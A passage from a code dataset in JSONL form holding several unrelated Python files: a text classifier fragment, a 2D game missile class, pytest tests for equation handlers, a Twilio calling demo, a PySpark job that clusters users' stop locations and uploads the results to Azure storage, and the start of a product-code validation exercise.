'utf-8')\n self.data.docCountOfClasses = json.load(f)\n f.close()\n f = open('data/frequencies.json', 'r', -1, 'utf-8')\n self.data.frequencies = json.load(f)\n f.close()\n #Testing\n self.articleClassifier = Classifier(self.data, tokenizer)\n doc = article.body\n #seg_list = jieba.lcut(doc, cut_all=False)\n seg_list = jieba.analyse.extract_tags(doc)\n doc = \" \".join(seg_list)\n classification = self.articleClassifier.classify(doc)\n return classification[0][0]\n","sub_path":"PTTModeratorHelper/NBC.py","file_name":"NBC.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"423171998","text":"from pico2d import *\nimport random\nimport game_framework\nimport game_world\nfrom game_object import GameObject\n\nclass Missile(GameObject):\n # image = None\n RUN_SPEED_PPS = 200\n def __init__(self, x, y, dx, dy, size):\n super(Missile, self).__init__()\n self.x, self.y = x, y\n self.dx, self.dy = dx, dy\n self.size = size\n self.w = 2 * size\n self.h = 2 * size\n self.fps = 8 + random.randint(0, 20)\n self.frame = random.randint(0, 23)\n self.init_image(Missile, 'fireball.png', 24)\n\n # def draw(self):\n # \tself.image.clip_draw(128 * self.frame, 0, 128, 128, self.x, self.y, 2 * self.size, 2 * self.size)\n\n def update(self):\n super(Missile,self).update_frame()\n if game_world.isPaused():\n return\n self.x += Missile.RUN_SPEED_PPS * game_framework.frame_time * self.dx\n self.y += Missile.RUN_SPEED_PPS * game_framework.frame_time * self.dy\n if self.x < -self.size or \\\n self.y < -self.size or \\\n self.x > get_canvas_width() + self.size or \\\n self.y > get_canvas_height() + self.size:\n game_world.remove_object(self)\n\n def isInField(self, width, height):\n if (self.x < 0): return False\n if (self.y < 0): return False\n if (self.x > width): return False\n if (self.y > height): return False\n return True","sub_path":"3-2/2D게임프로그래밍/2dgp-2018-2/pr1120_time/missile.py","file_name":"missile.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"469634232","text":"# -*- coding: utf-8 -*-\n# pylint: disable=E1101\n\"\"\"\nTests for NRWAL equation handler objects\n\"\"\"\nimport os\nimport numpy as np\nimport pytest\n\nfrom NRWAL.handlers.groups import EquationGroup\nfrom NRWAL.handlers.directories import EquationDirectory\n\nTEST_DIR = os.path.dirname(os.path.abspath(__file__))\nTEST_DATA_DIR = os.path.join(TEST_DIR, 'data/')\nMODULE_DIR = os.path.dirname(TEST_DIR)\nEQNS_DIR = os.path.join(MODULE_DIR, 'NRWAL/')\n\nGOOD_DIR = os.path.join(TEST_DATA_DIR, 'test_eqns_dir/')\n\nBAD_DIR = os.path.join(TEST_DATA_DIR, 'bad_eqn_dir/')\nBAD_FILE_TYPE = os.path.join(BAD_DIR, 'bad_file_type.txt')\nBAD_EQN = os.path.join(BAD_DIR, 'bad_list_eqn.yaml')\n\n\ndef test_print_eqn():\n \"\"\"Test the pretty printing and variable name parsing of equation strs\"\"\"\n fp = os.path.join(GOOD_DIR, 'subdir/jacket.yaml')\n obj = EquationGroup(fp)\n\n eqn_name = 'outfitting_8MW'\n known_vars = ('depth', 'outfitting_cost')\n eqn = obj[eqn_name]\n assert len(eqn.variables) == len(known_vars)\n assert all([v in eqn.variables for v in known_vars])\n assert all([v in str(eqn) for v in known_vars])\n assert eqn_name in str(eqn)\n\n eqn_name = 'lattice'\n known_vars = ('turbine_capacity', 'depth', 'lattice_cost')\n eqn = obj[eqn_name]\n assert len(eqn.variables) == len(known_vars)\n assert all([v in eqn.variables for v in known_vars])\n assert all([v in str(eqn) for v in known_vars])\n assert eqn_name in str(eqn)\n\n eqn = obj['subgroup::eqn1']\n assert isinstance(eqn.variables, list)\n assert not eqn.variables\n assert str(eqn) == '100'\n\n fp = os.path.join(GOOD_DIR, 'subdir/')\n obj = EquationDirectory(fp)\n eqn = obj['jacket::lattice']\n assert 'lattice_cost=100.0' in str(eqn)\n assert 'turbine_capacity, ' in str(eqn)\n assert 'depth, ' in str(eqn)\n\n\ndef test_eqn_eval():\n \"\"\"Test some simple evaluations and kwargs passing\"\"\"\n\n fp = os.path.join(GOOD_DIR, 'subdir/jacket.yaml')\n obj = EquationGroup(fp)\n\n assert obj['subgroup::eqn1'].evaluate() == 100\n\n eqn = obj['outfitting_8MW']\n kwargs = {k: 1 for k in eqn.variables}\n assert eqn.evaluate(**kwargs) == 55.2\n\n eqn = obj['lattice']\n kwargs = {k: 1 for k in eqn.variables}\n assert eqn.evaluate(**kwargs) == 41.07337083665887\n\n eqn = obj['lattice']\n kwargs = {k: np.ones((10, 10)) for k in eqn.variables}\n truth = 41.07337083665887 * np.ones((10, 10))\n assert np.allclose(eqn.evaluate(**kwargs), truth)\n\n with pytest.raises(RuntimeError):\n eqn.evaluate()\n\n\n@pytest.mark.parametrize('operator', ('+', '-', '*', '**', '/'))\ndef test_eqn_math(operator):\n \"\"\"Test the Equation object dunder math methods such as __add__ \"\"\"\n obj = EquationDirectory(GOOD_DIR)\n eqn1 = obj['jacket::lattice']\n eqn2 = obj['jacket::transition_piece']\n\n if operator == '+':\n eqn3 = eqn1 + eqn2\n eqn4 = eqn1 + 3\n elif operator == '-':\n eqn3 = eqn1 - eqn2\n eqn4 = eqn1 - 3\n elif operator == '*':\n eqn3 = eqn1 * eqn2\n eqn4 = eqn1 * 3\n elif operator == '**':\n eqn3 = eqn1 ** eqn2\n eqn4 = eqn1 ** 3\n elif operator == '/':\n eqn3 = eqn1 / eqn2\n eqn4 = eqn1 / 3\n\n assert str(eqn1) in str(eqn3)\n assert str(eqn2) in str(eqn3)\n assert eqn1.full in eqn3.full\n assert eqn2.full in eqn3.full\n assert str(eqn1) in str(eqn4)\n assert eqn1.full in eqn4.full\n assert '{} (3)'.format(operator) in eqn4.full\n\n args1 = {k: 2 for k in eqn1.variables}\n args2 = {k: 2 for k in eqn2.variables}\n args3 = {k: 2 for k in eqn3.variables}\n assert set(eqn1.variables + eqn2.variables) == set(eqn3.variables)\n assert eqn1.variables == eqn4.variables\n\n assert_eqn_eval_math(eqn1, eqn2, eqn3, eqn4, args1, args2, args3, operator)\n\n\ndef assert_eqn_eval_math(eqn1, eqn2, eqn3, eqn4, args1, args2, args3,\n operator):\n \"\"\"Run assert statements on Equation objects that have been combined using\n arithmetic operators\"\"\"\n if operator == '+':\n assert eqn1.eval(**args1) + eqn2.eval(**args2) == eqn3.eval(**args3)\n assert eqn1.eval(**args1) + 3 == eqn4.eval(**args1)\n elif operator == '-':\n assert eqn1.eval(**args1) - eqn2.eval(**args2) == eqn3.eval(**args3)\n assert eqn1.eval(**args1) - 3 == eqn4.eval(**args1)\n elif operator == '*':\n assert eqn1.eval(**args1) * eqn2.eval(**args2) == eqn3.eval(**args3)\n assert eqn1.eval(**args1) * 3 == eqn4.eval(**args1)\n elif operator == '**':\n assert eqn1.eval(**args1) ** eqn2.eval(**args2) == eqn3.eval(**args3)\n assert eqn1.eval(**args1) ** 3 == eqn4.eval(**args1)\n elif operator == '/':\n assert eqn1.eval(**args1) / eqn2.eval(**args2) == eqn3.eval(**args3)\n assert eqn1.eval(**args1) / 3 == eqn4.eval(**args1)\n","sub_path":"tests/test_handlers_equations.py","file_name":"test_handlers_equations.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"484631631","text":"from twilio.rest import Client\n\nclient = Client(TWILIO_ACCOUNT_SID, TWILIO_AUTH_TOKEN) # use your personal TWILIO_ACCOUNT_SID and TWILIO_AUTH_TOKEN as the values for the env variables.\n\ncall_receipients = ('+1-123-123-1234', '+1-123-123-1235', '+1-123-123-1236') # an array containing the phone numbers that will be called. \n\ndef create_phone_call():\n for receipient in call_receipients:\n \"\"\" creates voice calls to phone numbers in call_receipients. \n Use your personal TWILIO_PHONE_NUMBER as an env variable. \"\"\"\n call = client.calls.create(\n url='http://demo.twilio.com/docs/voice.xml',\n to=receipient,\n from_=TWILIO_PHONE_NUMBER\n )\n\n ","sub_path":"twilio_calls_src/calls/create_call.py","file_name":"create_call.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"631434756","text":"from __future__ import print_function\nfrom sklearn.cluster import DBSCAN\n\nimport argparse\nimport hashlib\nimport os\nimport time\n\nfrom datetime import date, datetime, timedelta\nfrom functools import reduce\nfrom math import degrees\n\nfrom concurrent.futures import ThreadPoolExecutor\nimport concurrent.futures\n\nfrom azure.storage.blob import BlobServiceClient, BlobClient, ContainerClient, BlobBlock\nfrom azure.core.exceptions import ResourceNotFoundError\n\nfrom pyspark import SparkContext, SparkConf, SQLContext\nfrom pyspark.sql import DataFrame, SparkSession\nimport pyspark.sql.functions as F\nfrom pyspark.sql.functions import col, udf\nfrom pyspark.sql.types import *\nfrom pyspark.sql.window import Window\nfrom pyspark import StorageLevel\nfrom pyspark.sql.functions import lag, pandas_udf, PandasUDFType\n\n# import logging\n\nVERSION = 5\n\n#\n# Driver settings\n#\nSHUFFLE_PARTITIONS = 32\nOUT_PARTITIONS = 2\nCORES = \"4\"\nRAM = \"12g\"\nAPP_NAME = \"StopUserClusters\"\n\n# always set overwrite\nWRITE_MODE = \"overwrite\"\nSKIP_EXISTING = False\nTHREADS = 32\n\n\n# templates\nTABLE_PATH = \"wasbs://{}@{}.blob.core.windows.net/{}/\"\nCONN_STRING = \"BlobEndpoint=https://{}.blob.core.windows.net/;SharedAccessSignature={}\"\n\n# need leading slash\nLOCAL_PATH = \"./table/\"\n\n\n#\n# Stop locations parameters\n#\nEVENTS_ROAM_DIST = 70 # meters\nSTOPS_ROAM_DIST = 65\nEARTH_RADIUS = 6372.795 * 1000\n\nUS_STATES = ['AK', 'AL', 'AR', 'AZ', 'CA', 'CO', 'CT', 'DC', 'DE', 'FL', 'GA', 'HI', 'IA', 'ID', 'IL', 'IN', 'KS', 'KY', 'LA', 'MA', 'MD', 'ME', 'MI', 'MN', 'MO', 'MS',\n 'MT', 'NC', 'ND', 'NE', 'NH', 'NJ', 'NM', 'NV', 'NY', 'OH', 'OK', 'OR', 'PA', 'PR', 'RI', 'SC', 'SD', 'TN', 'TX', 'UT', 'VA', 'VI', 'VT', 'WA', 'WI', 'WV', 'WY']\n\n\ndef read_multiple_df(spark, paths, format=\"parquet\"):\n dfs = None\n dfs_array = []\n for path in paths:\n dfs_load = spark.read.format(format).load(path)\n dfs_array.append(dfs_load)\n dfs = reduce(DataFrame.unionAll, dfs_array)\n return dfs\n\n\n#\n# Stop location lib\n#\n\n\ndef add_distance_column(dfs, order_column='timestamp'):\n # Radians lat/lon\n dfs = dfs.withColumn('latitude2', F.radians('latitude')).withColumn(\n 'longitude2', F.radians('longitude'))\n\n # Groups GPS locations into chucks. A chunk is formed by groups of points that are distant no more than roam_dist\n w = Window.partitionBy(['userID']).orderBy(order_column)\n dfs = dfs.withColumn('next_lat', F.lead('latitude2', 1).over(w))\n dfs = dfs.withColumn('next_lon', F.lead('longitude2', 1).over(w))\n\n # Haversine distance\n dfs = dfs.withColumn('distance_next', EARTH_RADIUS * 2 * F.asin(F.sqrt(\n F.pow(F.sin((col('next_lat') - col('latitude2')) / 2.0), 2) + F.cos('latitude2') * F.cos('next_lat') * F.pow(\n F.sin((col('next_lon') - col('longitude2')) / 2.0), 2))))\n dfs = dfs.withColumn('distance_prev', F.lag('distance_next', default=0).over(w)).drop(\n 'latitude2').drop('longitude2').drop('next_lon').drop('next_lat').drop('distance_next')\n return dfs\n\n\ndef get_destinations(dfs, roam_dist=110, earth_radius=6372.795 * 1000):\n \"\"\"\n Applies DBSCAN to extract the unique stop locations from a pyspark DataFrame\n\n :param x: DataFrame with ['id_client', 'latitude', 'longitude', \"from\", \"to\"]. Coordinates are in degrees.\n :param roam_dist: The stop location size in meters.\n :param earth_radius: The radius of the earth.\n :param group_results: If True, it groups by the cluster's location and id_client.\n :return: (pyspark DataFrame) If group_results=True: ['id_client', 'clatitude', 'clongitude', 'time_spent', 'frequency']\n (pyspark DataFrame) If group_results=False: ['id_client', 'latitude', 'longitude', 'clatitude', 'clongitude', 'from', 'to']\n \"\"\"\n\n @pandas_udf(\"userId string, state string, latitude double, longitude double, begin timestamp, end timestamp, clusterId integer\", PandasUDFType.GROUPED_MAP)\n def get_destinations(df):\n \"\"\"\n Applies DBSCAN to stop locations\n\n :param x: 2D numpy array with latitude and longitude.\n :param from_to_array: 2D numpy array with from and to timestamps.\n :param roam_dist: The stop location size in meters.\n :param earth_radius: The radius of the earth.\n :return: (pandas DataFrame) ['latitude', 'longitude', 'clatitude', 'clongitude', 'from', 'to', 'time_spent']\n \"\"\"\n db = DBSCAN(eps=roam_dist/earth_radius, min_samples=1,\n algorithm='ball_tree', metric='haversine')\n df[\"clusterId\"] = db.fit_predict(df[['latitude', 'longitude']])\n\n return df\n\n dfs = dfs.withColumn('latitude', F.radians('latitude'))\n dfs = dfs.withColumn('longitude', F.radians('longitude'))\n\n stops_dfs = dfs.groupby('userId', 'state').apply(get_destinations)\n\n stops_dfs = stops_dfs.withColumn('latitude', F.degrees('latitude'))\n stops_dfs = stops_dfs.withColumn('longitude', F.degrees('longitude'))\n\n w = Window().partitionBy('userId', 'clusterId')\n\n stops_dfs = stops_dfs.withColumn(\n 'clusterLatitude', F.mean('latitude').over(w))\n stops_dfs = stops_dfs.withColumn(\n 'clusterLongitude', F.mean('longitude').over(w))\n\n stops_dfs = stops_dfs.drop('latitude').drop('longitude')\n\n return stops_dfs\n\n#\n# Spark\n#\n\n\ndef getSparkConfig(cores, ram, partitions, azure_accounts, azure_oauth):\n # Setting enviroment variables and various drivers\n # \"org.apache.hadoop:hadoop-azure:2.10.0\" driver Azure\n # \"io.delta:delta-core_2.12:0.7.0\" driver Delta-lake\n # \"spark.sql.extensions=io.delta.sql.DeltaSparkSessionExtension\" configuration Delta\n # \"spark.sql.catalog.spark_catalog=org.apache.spark.sql.delta.catalog.DeltaCatalog\" configuration Delta\n # \"spark.delta.logStore.class=org.apache.spark.sql.delta.storage.AzureLogStore\" configuration Delta\n\n # Set spark environments\n os.environ['PYSPARK_PYTHON'] = '/usr/bin/python3'\n os.environ['PYSPARK_DRIVER_PYTHON'] = '/usr/bin/python3'\n # os.environ[\"PYSPARK_SUBMIT_ARGS\"] = \"\"\"--packages \"org.apache.hadoop:hadoop-azure:3.2.1\" pyspark-shell\"\"\"\n os.environ[\"PYSPARK_SUBMIT_ARGS\"] = \"\"\"--packages \"org.apache.hadoop:hadoop-azure:2.10.0\" --jars \"/mnt/batch/tasks/shared/sco-mobilitycovid-udf_2.11-1.0.jar\",\"/mnt/batch/tasks/shared/geo-0.7.7.jar\" pyspark-shell\"\"\"\n conf = (\n SparkConf()\n\n # SQL\n .set(\"spark.sql.shuffle.partitions\", partitions)\n .set(\"spark.sql.csv.filterPushdown.enabled\", \"false\")\n\n # Driver + memory\n .set(\"spark.driver.cores\", cores)\n .set(\"spark.shuffle.file.buffer\", \"1m\")\n # .set(\"spark.memory.offHeap.enabled\",\"true\")\n # .set(\"spark.memory.offHeap.size\",\"3g\")\n .set(\"spark.memory.fraction\", \"0.8\")\n .set(\"spark.memory.storageFraction\", \"0.2\")\n .set(\"spark.io.compression.lz4.blockSize\", \"128k\")\n .set(\"spark.driver.maxResultSize\", \"0\")\n .set(\"spark.driver.memory\", ram)\n\n # Local storage for spilling & storing temp files\n .set(\"spark.local.dir\", \"/mnt/batch/tasks/shared\")\n\n # Set master local\n .setMaster(\"local[*]\")\n\n # App name\n .setAppName(APP_NAME)\n )\n\n # Azure (Keys, Filesystem WASBS)\n conf.set(\"spark.hadoop.fs.wasbs.impl\",\n \"org.apache.hadoop.fs.azure.NativeAzureFileSystem\")\n\n for account in azure_accounts:\n conf.set(\"fs.azure.sas.{}.{}.blob.core.windows.net\".format(account['container'], account['storage']),\n account['sas'])\n\n if azure_oauth:\n conf.set(\"spark.hadoop.fs.azure.account.auth.type\", \"OAuth\")\n conf.set(\"spark.hadoop.fs.azure.account.oauth.provider.type\",\n \"org.apache.hadoop.fs.azurebfs.oauth2.ClientCredsTokenProvider\")\n conf.set(\"spark.hadoop.fs.azure.account.oauth2.client.id\",\n azure_oauth['client-id'])\n conf.set(\"spark.hadoop.fs.azure.account.oauth2.client.secret\",\n azure_oauth['client-secret'])\n conf.set(\"spark.hadoop.fs.azure.account.oauth2.client.endpoint\",\n azure_oauth['endpoint'])\n return conf\n\n#\n# Utils\n#\n\n\ndef enumerate_prefixes(start=0, end=256):\n for i in range(start, end):\n yield '{:02x}'.format(i)\n\n\ndef upload_blob(blob_service_client, container_out, blob_key, file_path):\n blob_client = blob_service_client.get_blob_client(\n container_out, blob_key)\n\n with open(file_path, \"rb\") as data:\n blob_client.upload_blob(data, overwrite=True)\n\n # cleanup\n os.remove(file_path)\n\n return blob_key\n\n#\n# Argparser\n#\n\n\ndef get_args():\n \"\"\"Parse command line arguments.\"\"\"\n\n parser = argparse.ArgumentParser(description=\"Cuebiq data processor\")\n requiredNamed = parser.add_argument_group('required arguments')\n requiredNamed.add_argument(\n \"--storage\", type=str, required=True, help=\"Azure storage\")\n requiredNamed.add_argument(\n \"--sas\", type=str, required=True, help=\"SAS token\")\n requiredNamed.add_argument(\n \"--oauth-login\", type=str, required=True, help=\"Oauth login\")\n requiredNamed.add_argument(\n \"--oauth-client-id\", type=str, required=True, help=\"Oauth client id\")\n requiredNamed.add_argument(\n \"--oauth-client-secret\", type=str, required=True, help=\"Oauth client secret\")\n requiredNamed.add_argument(\n \"--container-in\", type=str, required=True, help=\"Input container\")\n requiredNamed.add_argument(\n \"--container-out\", type=str, required=True, help=\"Output container\")\n requiredNamed.add_argument(\"--country\", type=str,\n help=\"Country. Options: 'US','IT'\")\n requiredNamed.add_argument(\"--prefix\", type=str, help=\"User prefix\")\n\n # optional\n parser.add_argument(\"--vm-cores\", default=CORES,\n type=str, help=\"Azure VM cores\")\n parser.add_argument(\"--vm-ram\", default=RAM,\n type=str, help=\"Azure VM ram\")\n parser.add_argument(\"--shuffle-partitions\", default=SHUFFLE_PARTITIONS,\n type=int, help=\"Spark shuffle partitions\")\n parser.add_argument(\"--roam-dist-stops\", type=int,\n default=STOPS_ROAM_DIST, help=\"Roam dist stops\")\n parser.add_argument(\"--roam-dist-events\", type=int,\n default=EVENTS_ROAM_DIST, help=\"Roam dist events\")\n parsed_args = parser.parse_args()\n\n return parsed_args\n\n\n#\n# Main function\n#\ndef main():\n \"\"\"Main function\"\"\"\n\n # Get args\n args = get_args()\n\n # container\n container_in = args.container_in\n container_out = args.container_out\n\n # Azure credentials\n sas_token = args.sas\n storage_account_name = args.storage\n azure_accounts = list()\n azure_accounts.append({\n \"storage\": storage_account_name,\n \"sas\": sas_token,\n \"container\": container_in\n })\n azure_accounts.append({\n \"storage\": storage_account_name,\n \"sas\": sas_token,\n \"container\": container_out\n })\n\n oauth_login = args.oauth_login\n oauth_client_id = args.oauth_client_id\n oauth_client_secret = args.oauth_client_secret\n\n # requires hadoop 3.2+\n # azure_oauth = {\n # \"endpoint\": oauth_login,\n # \"client-id\": oauth_client_id,\n # \"client-secret\": oauth_client_secret\n # }\n azure_oauth = False\n\n # VM\n cores = args.vm_cores\n ram = args.vm_ram\n shuffle_partitions = args.shuffle_partitions\n\n # Date, prefix\n country = args.country\n prefix = args.prefix\n\n # process config\n roam_dist_stops = args.roam_dist_stops\n roam_dist_events = args.roam_dist_events\n\n # Path in - path out\n blob_in = f\"wasbs://{container_in}@{storage_account_name}.blob.core.windows.net/stoplocation-v8_prefix_r70-s5-a70-h6/{country}/\"\n timezones_in = f\"wasbs://cuebiq-data@{storage_account_name}.blob.core.windows.net/utils_states_timezones/\"\n if azure_oauth:\n # we can leverage abfss\n blob_in = f\"abfss://{container_in}@{storage_account_name}.dfs.core.windows.net/stoplocation-v8_prefix_r70-s5-a70-h6/country={country}/\"\n timezones_in = f\"abfss://cuebiq-data@{storage_account_name}.dfs.core.windows.net/utils_states_timezones/\"\n\n path_out_distinct = f\"distinct_user_clusters-v8_r70-s5-a70-h6_clustered_{roam_dist_stops}m_v{VERSION}/country={country}\"\n path_out_all = f\"all_user_clusters-v8_r70-s5-a70-h6_clustered_{roam_dist_stops}m_v{VERSION}/country={country}\"\n\n # config spark\n conf = getSparkConfig(cores, ram, shuffle_partitions,\n azure_accounts, azure_oauth)\n\n # set prop for handling partition columns as strings (fixes prefixes as int)\n conf.set(\"spark.sql.sources.partitionColumnTypeInference.enabled\", \"false\")\n\n # Create spark session\n sc = SparkContext(conf=conf).getOrCreate()\n sqlContext = SQLContext(sc)\n spark = sqlContext.sparkSession\n # register UDF from jar\n spark.udf.registerJavaFunction(\n \"geohash\", \"it.smartcommunitylab.sco.mobilitycovid.udf.GeohashEncode\")\n\n # Init azure client\n blob_service_client = BlobServiceClient.from_connection_string(\n CONN_STRING.format(storage_account_name, sas_token))\n\n # build keys, date is mandatory, prefix opt\n partition_key = f\"prefix={prefix}\"\n\n print(\"process \"+partition_key)\n start_time = time.time()\n local_dir = LOCAL_PATH+partition_key\n print(\"write temp to \"+local_dir)\n\n # cleanup local if exists\n if (os.path.isdir(local_dir)):\n map(os.unlink, (os.path.join(local_dir, f)\n for f in os.listdir(local_dir)))\n\n # Input dataset\n print(\"read dataset table\")\n read_time = time.time()\n\n # explode days manually\n dates = [\n datetime(2020, 1, 1) + timedelta(days=x) for x in range(0, 258)]\n blobs_in = [\"{}/year={}/month={}/day={}/prefix={}\".format(\n blob_in, d.year, d.month, d.day, prefix) for d in dates]\n\n #dfs = spark.read.format(\"parquet\").load(*blobs_in)\n dfs = read_multiple_df(spark, blobs_in)\n dfs_timezones = spark.read.format(\"parquet\").load(timezones_in)\n\n # manually inject prefix column\n dfs = dfs.withColumn(\"prefix\", F.lit(prefix))\n\n # apply partition filter\n dfs_state = dfs.where(f\"prefix = '{prefix}'\")\n\n print(\"processing with spark\")\n spark_time = time.time()\n\n w = Window().partitionBy('userId').orderBy('begin')\n\n dfs_state = add_distance_column(dfs_state, order_column='begin')\n dfs_state = dfs_state.fillna(0, subset=['next_travelled_distance'])\n dfs_state = dfs_state.withColumn('lag_next_travelled_distance', F.lag(\n col('next_travelled_distance')).over(w))\n dfs_state = dfs_state.withColumn('lag_end', F.lag('end').over(w))\n dfs_state = dfs_state.withColumn('rn', F.when(((col('lag_next_travelled_distance') != col('prev_travelled_distance')) |\n (col('prev_travelled_distance') > 0) |\n (col('lag_next_travelled_distance') > 0) |\n (col('distance_prev') > roam_dist_events) |\n ((F.dayofyear(col('begin')) - F.dayofyear(col('lag_end')) == 1) &\n (F.hour(col('begin')) < 6))\n ) &\n ((col('lag_end').isNull()) | (col('lag_end') < col('begin'))), 1).otherwise(0))\n # Remove prev_travelled distance when rn == 0 (it happens when lag_end and begin overlap)\n dfs_state = dfs_state.withColumn('prev_travelled_distance', F.when(\n col('rn') == 0, 0).otherwise(col('prev_travelled_distance')))\n\n w = Window().partitionBy('userId').orderBy(\n 'begin').rangeBetween(Window.unboundedPreceding, 0)\n\n dfs_state = dfs_state.withColumn('group', F.sum('rn').over(w))\n\n dfs_state = dfs_state.groupBy('userId', 'group', 'state').agg(F.mean('latitude').alias('latitude'),\n F.mean('longitude').alias(\n 'longitude'),\n F.min('begin').alias(\n 'begin'),\n F.max('end').alias('end')).drop('group')\n\n dfs_destinations = get_destinations(dfs_state, roam_dist=roam_dist_stops)\n dfs_destinations = dfs_destinations.withColumn(\n 'prefix', dfs_destinations.userId.substr(1, 2))\n dfs_destinations = dfs_destinations.withColumn(\n 'dayofyear', F.dayofyear('begin'))\n dfs_destinations = dfs_destinations.withColumn('year', F.year('begin'))\n # dfs_destinations = dfs_destinations.withColumn('state', F.lit(state))\n\n # Local time\n dfs_destinations.createOrReplaceTempView(\"dfs_destinations\")\n dfs_destinations = spark.sql(\"\"\"\n SELECT dfs_destinations.*, geohash(clusterLatitude, clusterLongitude, 7) as geohash7\n from dfs_destinations\n \"\"\")\n dfs_destinations = dfs_destinations.withColumn(\n 'geohash5', F.substring(col('geohash7'), 1, 5))\n dfs_destinations = dfs_destinations.join(\n F.broadcast(dfs_timezones), on='geohash5').drop('geohash5')\n dfs_destinations = dfs_destinations.withColumn(\n 'local_begin', F.from_utc_timestamp(col('begin'), col('tzid')))\n dfs_destinations = dfs_destinations.withColumn('offset', (\n (col('local_begin').cast('long') - col('begin').cast('long')) / 3600).cast('int')).drop('local_begin')\n dfs_destinations.persist(StorageLevel.DISK_ONLY)\n\n # Write\n # output as country/prefix/part1..N\n local_dir_all = local_dir + \"/all/\"\n dfs_destinations_all = dfs_destinations.select(\n 'prefix', 'userId', 'clusterId', 'begin', 'end', 'offset', 'year', 'dayofyear')\n dfs_destinations_all.repartition(8, 'dayofyear').write.format('parquet').mode(\n 'overwrite').save(local_dir_all+\"prefix=\"+prefix+\"/\")\n\n # output as country/prefix/state\n local_dir_distinct = local_dir+\"/distinct/\"\n dfs_destinations_distinct = dfs_destinations.select(\n 'prefix', 'userId', 'clusterId', 'clusterLatitude', 'clusterLongitude', 'geohash7', 'state').distinct()\n dfs_destinations_distinct.repartition(\"state\").write.partitionBy(\n \"state\").format('parquet').mode('overwrite').save(local_dir_distinct+\"prefix=\"+prefix+\"/\")\n\n dfs_destinations.unpersist()\n\n print(\"upload local data to azure\")\n upload_time = time.time()\n\n # upload parts 1 \"prefix/state\"\n print(f\"upload files for distinct\")\n # upload with threads\n dfutures = []\n with ThreadPoolExecutor(max_workers=THREADS) as executor:\n fprefix = prefix\n print(f\"upload files for distinct: {fprefix}\")\n prefix_dir = local_dir_distinct+\"prefix=\"+fprefix\n prefix_key = f\"prefix={fprefix}\"\n\n for state in US_STATES:\n s_key = f\"state={state}\"\n f_dir = prefix_dir + \"/\"+s_key\n f_key = prefix_key + \"/\"+s_key\n\n # print(f\"read files for distinct from {f_dir}\")\n\n if (os.path.isdir(f_dir)):\n files = [filename for filename in os.listdir(\n f_dir) if filename.startswith(\"part-\")]\n\n if len(files) > 0:\n\n for file_local in files:\n file_path = f_dir+\"/\"+file_local\n part_num = int(file_local.split('-')[1])\n part_key = '{:05d}'.format(part_num)\n # fix name as static hash to be reproducible\n filename_hash = hashlib.sha1(\n str.encode(f_key+f_key+part_key)).hexdigest()\n\n blob_key = \"{}/{}/part-{}-{}.snappy.parquet\".format(\n path_out_distinct, f_key, part_key, filename_hash)\n\n # print(\"upload \" + file_path + \" to \" + container_out+\":\"+blob_key)\n # upload_blob(blob_service_client,container_out, blob_key, file_path)\n future = executor.submit(\n upload_blob, blob_service_client, container_out, blob_key, file_path)\n dfutures.append(future)\n\n # else:\n # print(f\"no files to upload for {f_key}\")\n\n # else:\n # print(f\"missing partition for {f_key}\")\n\n # end of loop, wait for futures\n for future in dfutures:\n bkey = future.result()\n\n # ensure we wait all tasks\n # TODO check if all done\n ddone = concurrent.futures.wait(dfutures)\n\n # upload parts 2 \"prefix/parts\"\n print(f\"upload files for all\")\n fprefix = prefix\n # upload with threads\n afutures = []\n with ThreadPoolExecutor(max_workers=THREADS) as executor:\n print(f\"upload files for all: {fprefix}\")\n prefix_dir = local_dir_all+\"prefix=\"+fprefix\n prefix_key = f\"prefix={fprefix}\"\n\n if (os.path.isdir(prefix_dir)):\n files = [filename for filename in os.listdir(\n prefix_dir) if filename.startswith(\"part-\")]\n\n if len(files) > 0:\n\n for file_local in files:\n file_path = prefix_dir+\"/\"+file_local\n part_num = int(file_local.split('-')[1])\n part_key = '{:05d}'.format(part_num)\n # fix name as static hash to be reproducible\n filename_hash = hashlib.sha1(\n str.encode(prefix_key+part_key)).hexdigest()\n\n blob_key = \"{}/{}/part-{}-{}.snappy.parquet\".format(\n path_out_all, prefix_key, part_key, filename_hash)\n\n # print(\"upload \" + file_path + \" to \" + container_out+\":\"+blob_key)\n # upload_blob(blob_service_client,container_out, blob_key, file_path)\n future = executor.submit(\n upload_blob, blob_service_client, container_out, blob_key, file_path)\n afutures.append(future)\n # else:\n # print(f\"no files to upload for {d_key}\")\n\n # else:\n # print(f\"missing partition for {d_key}\")\n # end of loop, wait for futures\n for future in afutures:\n bkey = future.result()\n\n # ensure we wait all tasks\n # TODO check if all done\n adone = concurrent.futures.wait(afutures)\n\n print(\"--- {} seconds elapsed ---\".format(int(time.time() - start_time)))\n print()\n shutdown_time = time.time()\n spark.stop()\n\n end_time = time.time()\n print(\"Done in {} seconds (read:{} spark:{} upload:{} shutdown:{})\".format(\n int(end_time - start_time),\n int(spark_time - read_time),\n int(upload_time - spark_time),\n int(shutdown_time - upload_time),\n int(end_time - shutdown_time)\n ))\n print('Done.')\n #\n # END OF CODE\n #\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/stop_user_clusters-v5.py","file_name":"stop_user_clusters-v5.py","file_ext":"py","file_size_in_byte":23107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"31112500","text":"#Imagine you're writing the software for an inventory system for\r\n#a store. Part of the software needs to check to see if inputted\r\n#product codes are valid.\r\n#\r\n#A product code is valid if all of the following conditions are\r\n#true:\r\n#\r\n# - The length of the product code is a multiple of 4. It could\r\n# be 4, 8, 12, 16, 20, etc. characters long.\r\n# - Every character in the product code is either an uppercase\r\n# character or a numeral. No lowercase letters or punctuation\r\n# marks are permitted.\r\n# - The character sequence \"A1\" appears somewhere in the\r\n# product code.\r\n#\r\n#Write a function called valid_product_code. valid_product_code\r\n#should have one parameter, a string. It should return True if\r\n#the string is a valid product code, and False if it is not.\r\n\r\n\r\n#Add your code here!\r\ndef valid_product_code(a_str):\r\n valid = []\r\n if len(a_str)%4 ==0:\r\n if 